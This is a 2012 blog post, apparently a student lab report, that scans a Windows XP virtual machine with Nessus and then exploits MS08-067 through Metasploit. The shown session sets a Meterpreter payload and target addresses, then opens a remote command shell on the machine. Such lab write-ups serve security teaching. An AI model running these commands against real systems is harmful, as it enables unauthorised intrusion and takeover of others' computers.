Daftar Blog Saya

Jumat, 27 Januari 2012

Framework Exploit


Exploiting an Windows XP Machine

A. Vulnerability Assesment
  1. Open the virtual windows xp sp3 again type : ipconfig to know ip this windows











  1. Open terminal and type :ifconfig to know ip number the host/ backtrack

  1. Open Nessus with login









  1. chose the menu scans and click add












input the name, type,policy and scan targets

  1. download report after complete scan

PLUGIN ID#
#
PLUGIN NAME
SEVERITY
35362
1
MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)
High Severity problem(s) found
34477
1
MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (uncredentialed check)
High Severity problem(s) found
57608
1
SMB Signing Disabled
Medium Severity problem(s) found
26920
1
Microsoft Windows SMB NULL Session Authentication
Medium Severity problem(s) found
11011
2
Microsoft Windows SMB Service Detection
Low Severity problem(s) found
54615
1
Device Type
Low Severity problem(s) found
45590
1
Common Platform Enumeration (CPE)
Low Severity problem(s) found
35716
1
Ethernet Card Manufacturer Detection
Low Severity problem(s) found
26917
1
Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry
Low Severity problem(s) found
25220
1
TCP/IP Timestamps Supported
Low Severity problem(s) found
19506
1
Nessus Scan Information
Low Severity problem(s) found
11936
1
OS Identification
Low Severity problem(s) found
11197
1
Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)
Low Severity problem(s) found
10884
1
Network Time Protocol (NTP) Server Detection
Low Severity problem(s) found
10785
1
Microsoft Windows SMB NativeLanManager Remote System Information Disclosure
Low Severity problem(s) found
10394
1
Microsoft Windows SMB Log In Possible
Low Severity problem(s) found
10287
1
Traceroute Information
Low Severity problem(s) found
10150
1
Windows NetBIOS / SMB Remote Host Information Disclosure
Low Severity problem(s) found
10114
1
ICMP Timestamp Request Remote Date Disclosure
Low Severity problem(s) found

B. Exploit

1.      open the console and type : msfconsole
root@BT:~# msfconsole

 _                                                      _                                                                                                                                      
/  \  / \        __                          _   __    /_/ __                                                                                                                                   
| |\ /  | _____  \ \            ___   _____ | | /   \  _   \ \                                                                                                                                  
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | | | |  || | |- -|                                                                                                                                 
|_|   | | | _|__  | |_  / -\ __\ \   | |    | |_ \__/ | |  | |_                                                                                                                                
      |/  |____/  \___\/ /\  \___/   \/      \__|     |_\  \___\                                                                                                                               
                                                                                                                                                                                                

       =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
       =[ svn r14551 updated 14 days ago (2012.01.14)

Warning: This copy of the Metasploit Framework was last updated 14 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:

2.     I searching for the MS08-067 NetAPI exploit in the Framework at.
msf > search ms08_067_netapi

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption

3.  after having found exploit,i type:
msf > use windows/smb/ms08_067_netapi

4.      next, at I set the payload as Windows-based Meterpreter bind_tcp, which, if successful, will start a connection on the target and connect back to the attacking machine.
msf  exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

5.   type show targets to identify the system want to target
msf  exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)
   15  Windows XP SP2 Arabic (NX)
   16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   17  Windows XP SP2 Chinese - Simplified (NX)
   18  Windows XP SP2 Chinese - Traditional (NX)
   19  Windows XP SP2 Czech (NX)
   2   Windows XP SP0/SP1 Universal
   20  Windows XP SP2 Danish (NX)
   21  Windows XP SP2 German (NX)
   22  Windows XP SP2 Greek (NX)
   23  Windows XP SP2 Spanish (NX)
   24  Windows XP SP2 Finnish (NX)
   25  Windows XP SP2 French (NX)
   26  Windows XP SP2 Hebrew (NX)
   27  Windows XP SP2 Hungarian (NX)
   28  Windows XP SP2 Italian (NX)
   29  Windows XP SP2 Japanese (NX)
   3   Windows XP SP2 English (AlwaysOn NX)
   30  Windows XP SP2 Korean (NX)
   31  Windows XP SP2 Dutch (NX)
   32  Windows XP SP2 Norwegian (NX)
   33  Windows XP SP2 Polish (NX)
   34  Windows XP SP2 Portuguese - Brazilian (NX)
   35  Windows XP SP2 Portuguese (NX)
   36  Windows XP SP2 Russian (NX)
   37  Windows XP SP2 Swedish (NX)
   38  Windows XP SP2 Turkish (NX)
   39  Windows XP SP3 Arabic (NX)
   4   Windows XP SP2 English (NX)
   40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   41  Windows XP SP3 Chinese - Simplified (NX)
   42  Windows XP SP3 Chinese - Traditional (NX)
   43  Windows XP SP3 Czech (NX)
   44  Windows XP SP3 Danish (NX)
   45  Windows XP SP3 German (NX)
   46  Windows XP SP3 Greek (NX)
   47  Windows XP SP3 Spanish (NX)
   48  Windows XP SP3 Finnish (NX)
   49  Windows XP SP3 French (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   50  Windows XP SP3 Hebrew (NX)
   51  Windows XP SP3 Hungarian (NX)
   52  Windows XP SP3 Italian (NX)
   53  Windows XP SP3 Japanese (NX)
   54  Windows XP SP3 Korean (NX)
   55  Windows XP SP3 Dutch (NX)
   56  Windows XP SP3 Norwegian (NX)
   57  Windows XP SP3 Polish (NX)
   58  Windows XP SP3 Portuguese - Brazilian (NX)
   59  Windows XP SP3 Portuguese (NX)
   6   Windows XP SP3 English (NX)
   60  Windows XP SP3 Russian (NX)
   61  Windows XP SP3 Swedish (NX)
   62  Windows XP SP3 Turkish (NX)
   63  Windows 2003 SP2 Japanese (NO NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)

6. I then set out target to Windows XP SP3 English(Always on NX)
msf  exploit(ms08_067_netapi) > set target 5
target => 5

7. At I set the IP address of our target machine which, by defining the RHOST value, is vulnerable to the MS08-067 exploit.
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101

8. type: set LHOST IP address attacking machine
msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.100
LHOST => 192.168.56.100

9. and type the LPORT option at specifies the port to which our attacker machine will listen for a connection from our target.
msf  exploit(ms08_067_netapi) > set LPORT 8080
LPORT => 8080

10. Enter show options to make sure that the options are setup corectly.
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.101   yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LPORT     8080             yes       The listen port
   RHOST     192.168.56.101   no        The target address


Exploit target:

   Id  Name
   --  ----
   5   Windows XP SP3 English (AlwaysOn NX)

11. type exploit at initiates our exploit and attempts to attack the target
msf  exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:48149 -> 192.168.56.101:8080) at 2012-01-28 01:07:04 +0700

12. Finally type shell to into an interactive command shell on the target
meterpreter > shell
Process 1172 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

1 komentar:

  1. where IG in your report? do you remmember the pyramid phase? please edit your report!

    -=IS2C=-

    BalasHapus